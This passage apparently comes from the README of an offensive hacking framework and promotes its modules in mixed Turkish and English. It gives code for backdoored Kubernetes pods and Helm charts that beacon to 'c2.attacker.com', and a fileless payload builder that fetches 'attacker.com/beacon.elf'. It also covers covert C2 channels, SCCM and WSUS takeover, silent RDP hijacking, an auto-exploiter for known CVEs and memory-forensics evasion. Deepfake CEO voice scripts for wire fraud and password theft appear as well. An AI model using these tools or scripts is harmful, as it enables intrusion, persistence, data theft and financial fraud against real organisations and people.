# Generate Shadow Admin Pod
shadow_yaml = exploiter.generate_shadow_pod_yaml(
name="coredns-helper",
namespace="kube-system",
callback_url="http://c2.attacker.com:4444",
privileged=True,
host_network=True,
host_pid=True
)
print(shadow_yaml)
# Helm Chart Backdoor
generator = HelmBackdoorGenerator()
# Create backdoored PostgreSQL chart
backdoor = generator.generate_chart(
chart_type=HelmChartType.POSTGRESQL,
callback_url="http://c2.attacker.com:4444",
payload_type="beacon",
include_daemonset=True # Runs on ALL nodes
)
# Files generated
for filename, content in backdoor.files.items():
print(f"{filename}: {len(content)} bytes")
# Chart.yaml, values.yaml, templates/deployment.yaml,
# templates/service.yaml, templates/metrics-collector.yaml (hidden backdoor!)
# DevOps runs: helm install mydb ./postgresql
# Result: Your agent on EVERY node via DaemonSet! 🎯
\`\`\`
### 🔗 K8s Kraken API Endpoints
\`\`\`
GET /k8s-kraken/ - K8s Kraken Dashboard
GET /k8s-kraken/api/status - Module availability
POST /k8s-kraken/api/kubelet/scan - Scan Kubelet API
POST /k8s-kraken/api/kubelet/pods - List pods via Kubelet
POST /k8s-kraken/api/kubelet/exec - Exec command in container
POST /k8s-kraken/api/kubelet/secrets - Extract secrets from pods
POST /k8s-kraken/api/kubelet/shadow-pod - Generate shadow admin pod YAML
POST /k8s-kraken/api/kubelet/etcd-script- Generate ETCD extraction script
GET /k8s-kraken/api/helm/chart-types - List available chart templates
POST /k8s-kraken/api/helm/generate - Generate backdoored Helm chart
POST /k8s-kraken/api/helm/download - Download chart as ZIP
POST /k8s-kraken/api/scan-range - Scan IP range for Kubelet
GET /k8s-kraken/api/attack-playbook - Get K8s attack playbook
\`\`\`
## �👻 DDexec - Fileless Linux Execution (February 2025)
Linux'ta hayalet gibi hareket et. DDexec tekniği /proc/self/mem üzerinden binary'leri disk'e dokunmadan bellekte execute eder. noexec mount'ları bypass, forensic-resistant execution.
### 🔴 DDexec Teknik Detayları
\`\`\`
┌─────────────────────────────────────────────────────────────────────────────────────────┐
│ 👻 DDEXEC - GHOST MODE │
│ Linux'ta /proc/self/mem Üzerinden Fileless Binary Execution │
│ cybermodules/dd_executor.py (~450 lines) │
│ 💀 "Disk'e Dokunma = Hayalet Ol" 💀 │
└─────────────────────────────────────────────────────────────────────────────────────────┘
HOW IT WORKS:
┌──────────────┐ ┌──────────────┐ ┌──────────────┐ ┌──────────────┐
│ Read return │ -> │ Open memory │ -> │ Write stager │ -> │ Stager loads │
│ address from │ │ file at │ │ shellcode │ │ ELF from │
│ /proc/self/ │ │ /proc/self/ │ │ to hijack │ │ stdin │
│ syscall │ │ mem │ │ shell │ │ │
└──────────────┘ └──────────────┘ └──────────────┘ └──────────────┘
│ │ │ │
v v v v
Get instruction exec 7> printf stager Binary runs
pointer location /proc/self/mem >&7 IN MEMORY ONLY!
SUPPORTED ARCHITECTURES:
┌─────────────────────────────────────────────────────────────────┐
│ ARCH │ STAGER SIZE │ SEEKERS │
├─────────────────────────────────────────────────────────────────┤
│ x86_64 │ ~100 bytes │ tail, dd, hexdump, cmp, xxd │
│ aarch64 │ ~120 bytes │ tail, dd, hexdump, cmp, xxd │
└─────────────────────────────────────────────────────────────────┘
SUPPORTED SHELLS:
✅ bash - Full support
✅ zsh - Full support (emulate sh mode)
✅ ash - Busybox support
WHY IT'S DANGEROUS:
🔴 noexec mount bypass - Works on /tmp, /dev/shm even if noexec
🔴 No disk writes - Binary never touches disk = no IoC files
🔴 Process spoofing - argv[0] can be anything: [kworker/0:0]
🔴 Forensic resistant - Nothing to find on disk
🔴 AV/EDR bypass - No file to scan
PROCESS NAME SPOOFING EXAMPLES:
[kworker/0:0] → Looks like kernel worker thread
[migration/0] → Looks like CPU migration task
/usr/sbin/sshd → Looks like SSH daemon
systemd-journald → Looks like system service
\`\`\`
### 📦 Usage Examples
\`\`\`python
from cybermodules.dd_executor import DDExecBuilder
# Initialize builder
builder = DDExecBuilder(
architecture="auto", # Auto-detect from ELF header
seeker="tail", # Use tail for lseek (default)
compress=True # Gzip compress before base64
)
# Generate fileless payload
payload = builder.generate_payload(
binary_path="/tmp/beacon",
argv0="[kworker/0:0]", # Fake process name
args=["--callback", "10.0.0.1"]
)
# Execute on target
# bash -c "payload.command"
print(payload.command)
# Remote URL execution (wget + DDexec)
remote_cmd = builder.generate_remote_payload(
url="https://attacker.com/beacon.elf",
argv0="[migration/0]"
)
# Direct shellcode execution
shellcode_cmd = builder.generate_shellcode_payload(
shellcode=b"\\x90\\x90...",
architecture="x86_64"
)
\`\`\`
### 🛡️ Detection Capabilities (Defensive)
\`\`\`python
from cybermodules.dd_executor import DDExecDetector
# Analyze suspicious command
result = DDExecDetector.check_command(suspicious_command)
# Returns:
# {
# "is_ddexec": True,
# "risk_score": 80,
# "findings": [
# {"indicator": "/proc/self/mem", "type": "ddexec_technique"},
# {"indicator": "exec 7>/proc/self/mem", "type": "ddexec_technique"}
# ],
# "recommendation": "Investigate process memory modifications"
# }
\`\`\`
### 🔗 DDexec API Endpoints
\`\`\`
GET /ddexec/ - DDexec Dashboard (Ghost Mode UI)
GET /ddexec/api/status - Module availability check
POST /ddexec/api/generate - Generate fileless payload from binary
POST /ddexec/api/generate-remote - Generate remote URL payload
POST /ddexec/api/generate-shellcode - Generate shellcode execution payload
POST /ddexec/api/detect - Analyze command for DDexec indicators
POST /ddexec/api/quick - Quick payload generation (file upload)
POST /ddexec/api/agent//execute - Queue DDexec command for agent
\`\`\`
\`\`\`
## 🕵️ Exotic Exfiltration PRO Modules (February 2025)
Firewall'ları ve DLP sistemlerini delirtecek covert channel modülleri. Trafik analizi yapılamaz, engellenmesi imkansız.
### 🌐 DNS-over-HTTPS (DoH) C2 Channel
┌─────────────────────────────────────────────────────────────────────────────────────────┐
│ 🌐 DNS-OVER-HTTPS C2 CHANNEL │
│ Firewall "Bu Google ile konuşuyor" Sanarken Gizli C2 │
│ tools/doh_c2.py (~750 lines) │
│ 🔒 Double Encryption: TLS + AES-256-GCM 🔒 │
└─────────────────────────────────────────────────────────────────────────────────────────┘
DOH PROVIDERS:
🔴 Google DNS - https://dns.google/dns-query
🟠 Cloudflare DNS - https://cloudflare-dns.com/dns-query
🟣 Quad9 DNS - https://dns.quad9.net/dns-query
🔵 NextDNS - https://dns.nextdns.io/dns-query
🟢 AdGuard DNS - https://dns.adguard.com/dns-query
HOW IT WORKS:
1. Command Encoded → Base32 → DNS labels
2. Query Built → cmd.data.session.c2.com
3. DoH Request → HTTPS POST → dns.google
4. Response → TXT record = C2 data
FIREWALL PERSPECTIVE:
✓ HTTPS to dns.google.com
✓ Content-Type: dns-message
✓ Looks like legitimate DNS
❌ Cannot inspect content
❌ Cannot block Google DNS!
IMPLANT GENERATION:
🐍 Python (Full featured)
💠 PowerShell (Windows native)
🔷 C# (.NET Framework)
FEATURES:
🔐 AES-256-GCM encryption on top of TLS
📦 Chunked transfer for large payloads
🎲 Beacon jitter for detection evasion
📊 Multiple record types (TXT, A, AAAA, NULL)
🔄 Provider rotation for resilience
API Endpoints:
POST /doh-c2/api/create-session - Create DoH C2 session
POST /doh-c2/api/generate-implant - Generate implant code
POST /doh-c2/api/build-query - Build sample DNS query
GET /doh-c2/api/statistics - Get channel statistics
GET /doh-c2/api/providers - List DoH providers
### 📡 ICMP Tunneling (Ping Channel)
┌─────────────────────────────────────────────────────────────────────────────────────────┐
│ 📡 ICMP TUNNELING (PING CHANNEL) │
│ Çoğu Şirket Ping'i Engellemez - Bunu Kullan! │
│ tools/icmp_tunnel.py (~700 lines) │
│ 🏓 Hide C2 in Ping Packets 🏓 │
└─────────────────────────────────────────────────────────────────────────────────────────┘
ICMP PACKET STRUCTURE:
┌─────────────────────────────────────┐
│ Type │ Code │ Checksum │
│ Identifier │ Sequence Number │
│ Payload: [MAGIC(4B)][ENCRYPTED C2] │
└─────────────────────────────────────┘
TUNNEL MODES:
🔄 HALF_DUPLEX - Data in Echo Request only
🔁 FULL_DUPLEX - Data in both Request and Reply
📏 COVERT_SIZE - Data encoded in packet size variations
⏱️ COVERT_TIMING - Data encoded in timing between packets
STANDARD SIZES (Blend In): 56, 64, 84, 128, 256, 512, 1024 bytes
IDS/FIREWALL PERSPECTIVE:
→ ICMP Echo Request, Type 8, Code 0
→ 64 bytes payload
→ Destination: External IP
Status: ✓ ALLOWED "Normal ping traffic"
Reality: Each packet contains encrypted C2 commands! 🔴
CAPABILITIES:
💀 Command Execution
📤 Data Exfiltration
🔐 AES-256 Encryption
📦 Chunked Transfer
🎯 Session Management
IMPLANT GENERATION:
🐍 Python (Raw sockets, root required)
💠 PowerShell (Admin required, uses .NET Ping)
⚙️ C (Compile with gcc, most portable)
API Endpoints:
POST /icmp-tunnel/api/create-session - Create tunnel session
POST /icmp-tunnel/api/generate-implant - Generate implant code
POST /icmp-tunnel/api/simulate-traffic - Simulate traffic demo
GET /icmp-tunnel/api/statistics - Get tunnel statistics
GET /icmp-tunnel/api/modes - List tunnel modes
### 🤖 Telegram/Discord Bot C2
┌─────────────────────────────────────────────────────────────────────────────────────────┐
│ 🤖 TELEGRAM/DISCORD BOT C2 │
│ IP'in ASLA Görünmez - Platform Sunucuları Kullan │
│ tools/telegram_c2.py (~800 lines) │
│ 🛡️ Zero Infrastructure - Use Their Servers 🛡️ │
└─────────────────────────────────────────────────────────────────────────────────────────┘
SUPPORTED PLATFORMS:
✈️ TELEGRAM
• Bot API (@BotFather)
• Chat ID for commands
• File upload support
• Long polling
🎮 DISCORD
• Webhook URL (easy!)
• Bot token optional
• Rich embeds
• Gaming traffic cover
💬 SLACK (Optional)
• Webhook integration
• Corporate blend-in
🔗 MATRIX (Decentralized)
• Self-hosted possible
• E2E encryption
TRAFFIC FLOW:
VICTIM 💻 --HTTPS--> TELEGRAM/DISCORD SERVERS --HTTPS--> YOU 😈 (HIDDEN)
VICTIM'S LOGS: "Connection to api.telegram.org:443"
YOUR IP: ███████ NEVER VISIBLE
ADVANTAGES:
🔒 IP HIDDEN - Your IP never appears in victim's logs
🏢 NO INFRA - Use Telegram's servers for free!
🚫 HARD TO BLOCK - Can't block telegram.org easily
🎭 BLENDS IN - Looks like normal chat app traffic
FEATURES:
📱 Mobile Control - Command from phone app
🔐 AES-256 + TLS - Double encryption layer
📊 Rich Embeds - Beautiful beacon data
📁 File Transfer - Upload/download via bot
⏱️ Beacon Jitter - Random timing evasion
SETUP EXAMPLE (Telegram):
1. Create bot with @BotFather → Get TOKEN
2. Create group/channel → Get CHAT_ID
3. Generate implant with token + chat_id
4. Victim runs implant → Beacon appears in your Telegram!
5. Send commands as messages → Results returned as replies
IMPLANT GENERATION:
🐍 Python (Telegram Bot API / Discord Webhook)
💠 PowerShell (Invoke-RestMethod based)
API Endpoints:
POST /telegram-c2/api/configure - Configure bot settings
POST /telegram-c2/api/generate-implant - Generate implant code
POST /telegram-c2/api/send-command - Send command (demo)
GET /telegram-c2/api/statistics - Get C2 statistics
GET /telegram-c2/api/platforms - List supported platforms
GET /telegram-c2/api/advantages - List advantages
## 🚀 Lateral Movement PRO Modules (February 2025)
Enterprise ağlarda hayalet gibi gezme modülleri. SCCM, RDP ve WSUS ile tüm ağı ele geçir!
### 🖥️ SCCM/MECM Hunter - "Game Over" Button
┌─────────────────────────────────────────────────────────────────────────────────────────┐
│ 🖥️ SCCM/MECM HUNTER - GAME OVER BUTTON │
│ SCCM Admin = Domain Admin. Şirketin TÜM bilgisayarlarına hükmet! │
│ tools/sccm_hunter.py (~750 lines) │
│ 🎯 The Ultimate Enterprise Takeover Tool 🎯 │
└─────────────────────────────────────────────────────────────────────────────────────────┘
SCCM/MECM NEDIR?
Microsoft System Center Configuration Manager (SCCM/MECM):
- Şirketlerdeki yazılım dağıtım sunucusu
- TÜM bilgisayarlara uygulama/update dağıtır
- Tam admin yetkisiyle her şeyi çalıştırabilir
- SCCM Admin ≈ Domain Admin (hatta DAHA FAZLA!)
ATTACK CHAIN:
┌────────────┐ ┌────────────┐ ┌────────────┐ ┌────────────┐ ┌────────────┐
│ 1.DISCOVER │───▶│ 2.NAA CRED │───▶│ 3.ADMIN │───▶│ 4.PACKAGE │───▶│ 5.DEPLOY │
│ │ │ EXTRACT │ │ SERVICE │ │ CREATE │ │ TO ALL │
│ • LDAP │ │ • DPAPI │ │ • REST API │ │ • Malicious│ │ • GAME │
│ • DNS SRV │ │ • WMI │ │ • Full │ │ MSI/EXE │ │ OVER! │
│ • SPN Enum │ │ • Registry │ │ Control │ │ • Task Seq │ │ │
└────────────┘ └────────────┘ └────────────┘ └────────────┘ └────────────┘
DISCOVERY METHODS:
🔍 LDAP Query - CN=System Management container arama
🌐 DNS SRV - _mssms-mp-._tcp.domain.com
🎫 SPN Enum - SMS/SCCM service principal names
📡 Network Scan - SCCM portları (80, 443, 8530, 8531)
CREDENTIAL EXTRACTION:
🔐 NAA Credentials (Network Access Account)
- WMI: root\ccm\policy\Machine\ActualConfig
- DPAPI decryption ile şifreyi çöz
- Bu hesap genelde over-privileged!
🔑 Task Sequence Media Password
- PXE boot images içindeki şifreler
- Boot sırasında yakalanabilir
ADMIN SERVICE ATTACK:
📡 REST API Endpoints:
/AdminService/wmi/SMS_Site
/AdminService/wmi/SMS_Application
/AdminService/wmi/SMS_Package
/AdminService/wmi/SMS_Advertisement
⚡ Yapabileceklerin:
- Malicious Application oluştur
- Tüm Collection'lara deploy et
- Task Sequence ile boot-time saldırı
- Script çalıştır (PowerShell, batch)
PXE BOOT ATTACK:
🥾 Boot Image Injection:
1. PXE sunucusunu bul
2. Boot image'ı indir
3. Backdoor ekle
4. Yeni makineler backdoor'lu boot olur!
IMPLANT GENERATION:
🐍 Python (WMI + AdminService)
💠 PowerShell (Native Windows)
🔷 C# (AdminService REST client)
API Endpoints:
POST /sccm-hunter/api/create-session - Create hunt session
POST /sccm-hunter/api/discover - Discover SCCM servers
POST /sccm-hunter/api/extract-naa - Extract NAA credentials
POST /sccm-hunter/api/attack-admin-service - Connect to AdminService
POST /sccm-hunter/api/create-package - Create malicious package
POST /sccm-hunter/api/task-sequence - Create task sequence
POST /sccm-hunter/api/pxe-attack - PXE boot attack
POST /sccm-hunter/api/generate-implant - Generate implant code
GET /sccm-hunter/api/playbook - Full attack playbook
### 👻 RDP Hijacking - Shadow Session Attack
┌─────────────────────────────────────────────────────────────────────────────────────────┐
│ 👻 RDP HIJACKING - SHADOW SESSION │
│ Kullanıcının Ruhu Duymadan RDP Oturumuna Bağlan! │
│ tools/rdp_hijack.py (~600 lines) │
│ 🎭 Silent Session Takeover 🎭 │
└─────────────────────────────────────────────────────────────────────────────────────────┘
RDP SHADOW NEDIR?
Windows'un yerleşik özelliği:
- Aktif RDP oturumunu izleyebilirsin (view)
- Kontrol alabilirsin (control)
- Disconnected oturumu ele geçirebilirsin
- Doğru ayarlarla kullanıcı HİÇBİR ŞEY farketmez!
ATTACK MODES:
┌────────────────────────────────────────────────────────────────────────────────────┐
│ MODE │ DESCRIPTION │ DETECTION RISK │
├────────────────────────────────────────────────────────────────────────────────────┤
│ 👁️ VIEW ONLY │ Sadece izle, dokunma │ LOW (prompt varsa MEDIUM) │
│ 🖱️ CONTROL │ Mouse + keyboard kontrol │ MEDIUM (prompt varsa HIGH) │
│ 👻 SILENT VIEW │ Registry mod + izle │ VERY LOW (no prompt!) │
│ 💀 SILENT CTRL │ Registry mod + tam kontrol │ LOW (no prompt!) │
└────────────────────────────────────────────────────────────────────────────────────┘
SESSION ENUMERATION:
🔍 Methods:
- qwinsta /server:TARGET (query user)
- WMI: Win32_LogonSession + Win32_LoggedOnUser
- PsLoggedOn equivalent
📊 Info Gathered:
- Session ID, Username, Domain
- State (Active/Disconnected/Idle)
- Client IP, Logon Time, Idle Time
- Is Admin? (High value target!)
SHADOW SESSION:
💻 Native Command:
mstsc /shadow: /v: /control
🔇 Silent Shadow (No Prompt):
Registry: HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services
- fAllowToGetHelp = 1
- Shadow = 2 (Full Control without consent)
- fAllowFullControl = 1
DISCONNECTED SESSION TAKEOVER:
⚠️ ÇOĞU KIŞI BİLMİYOR:
- Disconnected RDP = Oturum hala açık!
- SYSTEM yetkisiyle doğrudan bağlanabilirsin!
💀 Takeover Command (as SYSTEM):
tscon /dest:console
🔧 Methods to Get SYSTEM:
- sc create + binpath
- PsExec -s
- Scheduled Task as SYSTEM
CAPTURE TOOLS:
⌨️ Keylogger (Shadow sırasında)
📸 Screenshot Capture
🎥 Session Recording
IMPLANT GENERATION:
💠 PowerShell (Native Windows)
🐍 Python (WMI based)
API Endpoints:
POST /rdp-hijack/api/enumerate - List RDP sessions
POST /rdp-hijack/api/shadow - Shadow a session
POST /rdp-hijack/api/generate-commands - Generate attack commands
POST /rdp-hijack/api/takeover - Takeover disconnected session
POST /rdp-hijack/api/enable-silent-shadow - Enable no-prompt shadow
POST /rdp-hijack/api/capture-keystrokes - Get keylogger code
POST /rdp-hijack/api/generate-implant - Generate implant code
GET /rdp-hijack/api/techniques - List all techniques
### 🔄 WSUS Spoofing - Fake Windows Update
┌─────────────────────────────────────────────────────────────────────────────────────────┐
│ 🔄 WSUS SPOOFING - FAKE WINDOWS UPDATE │
│ "Windows Update Available!" → Aslında Senin Payload'un 😈 │
│ tools/wsus_spoof.py (~700 lines) │
│ 🎭 The Update Server is LYING 🎭 │
└─────────────────────────────────────────────────────────────────────────────────────────┘
WSUS NEDIR?
Windows Server Update Services:
- Şirketlerin kendi update sunucusu
- Tüm Windows makineler buradan güncellenir
- HTTP kullanıyorsa → MITM ile sahte update ver!
- Update SYSTEM yetkisiyle çalışır!
ATTACK FLOW:
┌────────────┐ ┌────────────┐ ┌────────────┐ ┌────────────┐ ┌────────────┐
│ 1.POISON │───▶│ 2.FAKE │───▶│ 3.CLIENT │───▶│ 4.SERVE │───▶│ 5.SYSTEM │
│ NETWORK │ │ WSUS │ │ SYNC │ │ UPDATE │ │ SHELL! │
│ │ │ SERVER │ │ │ │ │ │ │
│ • ARP Spoof│ │ • HTTP │ │ • Client │ │ • Fake KB │ │ • Payload │
│ • DNS Spoof│ │ Server │ │ connects │ │ • Your EXE │ │ runs as │
│ • LLMNR │ │ • SOAP XML │ │ • Asks for │ │ • Signed? │ │ SYSTEM! │
│ • WPAD │ │ │ │ updates │ │ │ │ │
└────────────┘ └────────────┘ └────────────┘ └────────────┘ └────────────┘
POISONING METHODS:
🌐 ARP Spoofing:
- Gateway'i taklit et
- WSUS trafiğini yakala
- Sahte sunucuya yönlendir
🔤 DNS Spoofing:
- wsus.corp.local → Attacker IP
- Corporate DNS'i zehirle
📢 LLMNR/NBT-NS (Responder):
- WSUS hostname resolve isteklerini yakala
- Kendi IP'ni ver
🌍 WPAD Injection:
- Proxy ayarını değiştir
- WSUS trafiğini MITM yap
FAKE UPDATE CREATION:
📦 Legitimate KB Numbers:
- KB5034441 (Security Update)
- KB5034203 (Cumulative Update)
- KB5033375 (.NET Update)
- KB890830 (MSRT)
📋 WSUS Metadata (SOAP XML):
- UpdateID, RevisionNumber
- Title, Description, Severity
- File URL → Your payload!
⚠️ SIGNING:
- Microsoft imzası gerekli?
- Bazı sistemler enforce etmiyor!
- PsExec gibi imzalı araç kullan
FAKE WSUS SERVER:
🖥️ HTTP Server Features:
- /ClientWebService/Client.asmx
- GetExtendedUpdateInfo2
- SyncUpdates soap action
- CAB/EXE file serving
TOOLS INTEGRATION:
🔧 WSUSpect - https://github.com/pimps/wsuxploit
🔧 PyWSUS - https://github.com/GoSecure/pywsus
🔧 Responder - LLMNR/WPAD poisoning
IMPLANT GENERATION:
💠 PowerShell (Disguised as update)
🐍 Python (Fake WSUS server)
API Endpoints:
POST /wsus-spoof/api/create-session - Create spoof session
POST /wsus-spoof/api/create-update - Create fake update
POST /wsus-spoof/api/generate-poison-script - Generate ARP/DNS poison
POST /wsus-spoof/api/generate-server - Generate fake WSUS server
POST /wsus-spoof/api/generate-payload - Generate disguised payload
POST /wsus-spoof/api/generate-implant - Generate implant code
GET /wsus-spoof/api/responder-config - Get Responder config
GET /wsus-spoof/api/attack-flow - Full attack playbook
GET /wsus-spoof/api/tools - Recommended tools
## 🤖 AI & Automation PRO Modules (February 2025)
Yapay zeka destekli saldırı araçları. Deepfake ses klonlama ve otomatik N-Day exploitation!
### 🎤 Deepfake Vishing - CEO Voice Cloning
┌─────────────────────────────────────────────────────────────────────────────────────────┐
│ 🎤 DEEPFAKE VISHING - CEO VOICE CLONING │
│ "Hi, this is the CEO. I need you to transfer $50K immediately" │
│ tools/deepfake_vishing.py (~750 lines) │
│ 🔊 AI-Powered Voice Cloning & VoIP Attacks 🔊 │
└─────────────────────────────────────────────────────────────────────────────────────────┘
NEDIR?
Deepfake Vishing (Voice Phishing):
- CEO/CFO sesini yapay zeka ile klonla
- "Acil para transferi gerekli!" diyen ses kaydı oluştur
- VoIP ile gerçek telefon araması yap
- Caller ID spooflama ile CEO'nun numarasından ara
- Hedef muhasebe çalışanını ikna et → PROFIT!
ATTACK FLOW:
┌────────────┐ ┌────────────┐ ┌────────────┐ ┌────────────┐ ┌────────────┐
│ 1.COLLECT │───▶│ 2.CLONE │───▶│ 3.SCRIPT │───▶│ 4.SPOOF │───▶│ 5.CALL │
│ SAMPLE │ │ VOICE │ │ PREPARE │ │ CALLER │ │ TARGET │
│ │ │ │ │ │ │ ID │ │ │
│ • YouTube │ │ • Eleven │ │ • CEO │ │ • Twilio │ │ • Play │
│ • LinkedIn │ │ Labs API │ │ urgent │ │ • SIP │ │ audio │
│ • Webinar │ │ • Azure │ │ transfer │ │ • Asterisk │ │ • Social │
│ • Podcast │ │ • Local │ │ • IT pwd │ │ │ │ Engineer │
│ │ │ RVC │ │ • Vendor │ │ │ │ │
└────────────┘ └────────────┘ └────────────┘ └────────────┘ └────────────┘
VOICE PROVIDERS:
🔊 ElevenLabs (Best Quality)
- Professional voice cloning
- 30 saniye ses örneği yeterli
- Ultra-realistic output
☁️ Azure Cognitive Services
- Microsoft TTS with SSML
- Custom Neural Voice
🤖 OpenAI TTS
- GPT-powered voice synthesis
- Natural conversation flow
🖥️ Local RVC (Self-Hosted)
- Retrieval-based Voice Conversion
- No API limits
- Full offline capability
CALL PROVIDERS (VoIP):
📞 Twilio - Cloud telephony, easy API
📞 Vonage/Nexmo - Enterprise VoIP
📞 Plivo - Budget-friendly
📞 Asterisk PBX - Self-hosted, full control
📞 FreePBX - Web-managed Asterisk
📞 SIP Direct - Direct SIP trunking
SCRIPT TEMPLATES:
💰 CEO Urgent Transfer:
"Hi Sarah, this is John from the executive office. I'm in a critical
meeting and need you to process a wire transfer of $47,500 to our
vendor immediately. This is confidential - don't discuss with anyone.
I'll explain when I'm back. Please confirm when done."
🔐 IT Support Password Reset:
"Hello, this is Mike from IT Support. We're seeing unusual login attempts
on your account. For security, I need to verify your identity. Can you
confirm your current password so we can reset it properly?"
📄 Vendor Invoice Update:
"Hi, this is accounting from [Vendor]. We've updated our banking details
due to a recent merger. Please update your payment records. The new
account number is..."
VOICE EMOTIONS:
😰 Urgent - Stressed, time-sensitive (for wire fraud)
👔 Authoritative - Commanding, executive presence
😌 Calm - Professional, measured
😟 Worried - Concerned, anxious
😊 Friendly - Warm, approachable
VOICE SAMPLE COLLECTION:
🎯 Implants for collecting target voice samples:
- Python microphone capture
- PowerShell audio recording
- Browser-based recorder
📍 Sample Sources:
- YouTube interviews/presentations
- LinkedIn videos
- Webinars/podcasts
- Earnings calls
- Social media clips
API Endpoints:
GET /deepfake-vishing/api/providers - List voice/call providers
GET /deepfake-vishing/api/templates - Script templates
GET /deepfake-vishing/api/emotions - Voice emotion settings
POST /deepfake-vishing/api/profiles - Create voice profile
POST /deepfake-vishing/api/generate-audio - Generate deepfake audio
POST /deepfake-vishing/api/campaigns - Create vishing campaign
POST /deepfake-vishing/api/call - Initiate single call
GET /deepfake-vishing/api/statistics - Campaign statistics
### 🎯 AutoPwn Scanner - N-Day Exploiter
┌─────────────────────────────────────────────────────────────────────────────────────────┐
│ 🎯 AUTOPWN SCANNER - N-DAY AUTO-EXPLOITER │
│ Ağa girdiğinde otomatik olarak bilinen açıkları bul ve exploit et │
│ tools/autopwn_scanner.py (~900 lines) │
│ 🔥 Log4Shell • ProxyShell • ZeroLogon • EternalBlue 🔥 │
└─────────────────────────────────────────────────────────────────────────────────────────┘
NEDIR?
Automated Vulnerability Scanner with N-Day Exploitation:
- 25+ CRITICAL/HIGH vulnerability desteği
- Ağı tara, vulnerable hedefleri bul
- Auto-exploit mode: Sormadan shell al!
- Multi-threaded scanning (50+ concurrent)
- Campaign mode for large networks
SUPPORTED VULNERABILITIES:
═══════════════════════════════════════════════════════════════
🔴 CRITICAL (Immediate RCE)
═══════════════════════════════════════════════════════════════
🪵 Log4Shell (CVE-2021-44228)
- Apache Log4j JNDI RCE
- Affects: Java apps, Elastic, VMware, Minecraft
- Ports: 80, 443, 8080, 9200
📧 ProxyShell (CVE-2021-34473 chain)
- Exchange Server pre-auth RCE
- Full chain: SSRF → Impersonation → RCE
- Port: 443
📧 ProxyLogon (CVE-2021-26855)
- Exchange SSRF + arbitrary file write
- Port: 443
🔑 ZeroLogon (CVE-2020-1472)
- Netlogon privilege escalation
- Domain Controller → Domain Admin
- Ports: 135, 445
🖨️ PrintNightmare (CVE-2021-34527)
- Windows Print Spooler RCE
- Remote DLL loading → SYSTEM
- Port: 445
💀 EternalBlue (MS17-010)
- SMBv1 RCE (WannaCry exploit)
- Windows 7/Server 2008 R2
- Port: 445
🔵 BlueKeep (CVE-2019-0708)
- Windows RDP pre-auth RCE
- Port: 3389
🌱 Spring4Shell (CVE-2022-22965)
- Spring Framework RCE
- Ports: 80, 8080
📝 Confluence RCE (CVE-2022-26134)
- Atlassian OGNL injection
- Port: 8090
🔧 vCenter RCE (CVE-2021-22005)
- VMware arbitrary file upload
- Port: 443
🍊 Citrix ADC RCE (CVE-2023-3519)
- Unauthenticated RCE
- Port: 443
🛡️ FortiGate SSL-VPN (CVE-2023-27997)
- Heap buffer overflow
- Port: 443, 10443
📁 MOVEit RCE (CVE-2023-34362)
- SQL injection to RCE
- Port: 443
═══════════════════════════════════════════════════════════════
🟠 HIGH (Auth Bypass / PrivEsc)
═══════════════════════════════════════════════════════════════
🎟️ AD CS Certifried (CVE-2022-26923)
👻 SMBGhost (CVE-2020-0796)
🔓 PetitPotam (CVE-2021-36942)
🐱 Tomcat Ghostcat (CVE-2020-1938)
🏗️ Jenkins RCE (CVE-2024-23897)
💔 Heartbleed (CVE-2014-0160)
ATTACK FLOW:
┌────────────┐ ┌────────────┐ ┌────────────┐ ┌────────────┐ ┌────────────┐
│ 1.TARGET │───▶│ 2.PORT │───▶│ 3.VULN │───▶│ 4.AUTO │───▶│ 5.SHELL │
│ INPUT │ │ SCAN │ │ CHECK │ │ EXPLOIT │ │ MANAGE │
│ │ │ │ │ │ │ │ │ │
│ • CIDR │ │ • Top 20 │ │ • CVE │ │ • Log4j │ │ • Reverse │
│ • Range │ │ ports │ │ specific │ │ • ProxyS │ │ • Webshell │
│ • Single │ │ • Service │ │ checks │ │ • ZeroLog │ │ • Meterp │
│ • Hostname │ │ ID │ │ • Banner │ │ • EternalB │ │ • PTH/PTT │
│ │ │ │ │ grab │ │ │ │ │
└────────────┘ └────────────┘ └────────────┘ └────────────┘ └────────────┘
SCAN MODES:
🔍 Discovery Only (--no-exploit)
- Sadece vulnerable hedefleri listele
- Safe mode for assessment
⚡ Auto-Pwn Mode (Default)
- Vulnerable bulunduğunda otomatik exploit
- Sormadan shell al!
- Aggressive but effective
🎯 Manual Exploit
- Specific CVE, specific target
- Full control over exploitation
OUTPUT FORMATS:
📊 JSON Report - API/automation için
📄 HTML Report - Presentation için
🖥️ Live Dashboard - Real-time progress
EXPLOIT METHODS:
💥 Log4Shell:
- JNDI payload injection
- Multi-header spray (User-Agent, X-Forwarded-For, etc.)
- LDAP/RMI callback server
💥 ProxyShell/ProxyLogon:
- SSRF chain exploitation
- Webshell deployment
- Exchange mailbox access
💥 ZeroLogon:
- Netlogon auth bypass
- DC machine account password reset
- DCSync for all domain hashes
💥 EternalBlue:
- SMBv1 buffer overflow
- Kernel-mode code execution
- SYSTEM shell
API Endpoints:
GET /autopwn/api/vulnerabilities - List supported CVEs
GET /autopwn/api/sessions - List scan sessions
POST /autopwn/api/sessions - Create new scan
POST /autopwn/api/sessions/{id}/start - Start scanning
GET /autopwn/api/sessions/{id} - Get session details
GET /autopwn/api/sessions/{id}/report - Generate report
POST /autopwn/api/quick-scan - Quick single-target scan
POST /autopwn/api/exploit - Manual exploit trigger
GET /autopwn/api/shells - List active shells
GET /autopwn/api/statistics - Scanner stats
## � Memory Forensics Evasion PRO Module (February 2025)
RAM analizinde bile bulunamayan hayalet teknikleri! EDR'ları bypass eden gelişmiş bellek evasion.
### 🌙 Sleep Obfuscation - Ekko/Foliage
┌─────────────────────────────────────────────────────────────────────────────────────────┐
│ 👻 MEMORY FORENSICS EVASION - BELLEK HAYALETLERİ │
│ "RAM'de bile görünmez - Moneta, Volatility, EDR hepsi bypass!" │
│ tools/memory_forensics_evasion.py (~1200 lines) │
│ 🌙 Sleep Obfuscation • Stack Spoofing • Process Doppelgänging 🌙 │
└─────────────────────────────────────────────────────────────────────────────────────────┘
NEDIR?
Memory Forensics Evasion - RAM analizini imkansız kılan teknikler:
- Sleep sırasında belleği şifrele → EDR scan = anlamsız veri
- Stack trace'i sahte framelerle değiştir → Microsoft imzalı görün
- NTFS Transaction ile dosyasız process oluştur → Disk forensics imkansız
3 ANA TEKNİK:
══════════════════════════════════════════════════════════════
🌙 SLEEP OBFUSCATION (Ekko/Foliage)
══════════════════════════════════════════════════════════════
Ajan uyurken (sleep), bellek bölgesini şifreler:
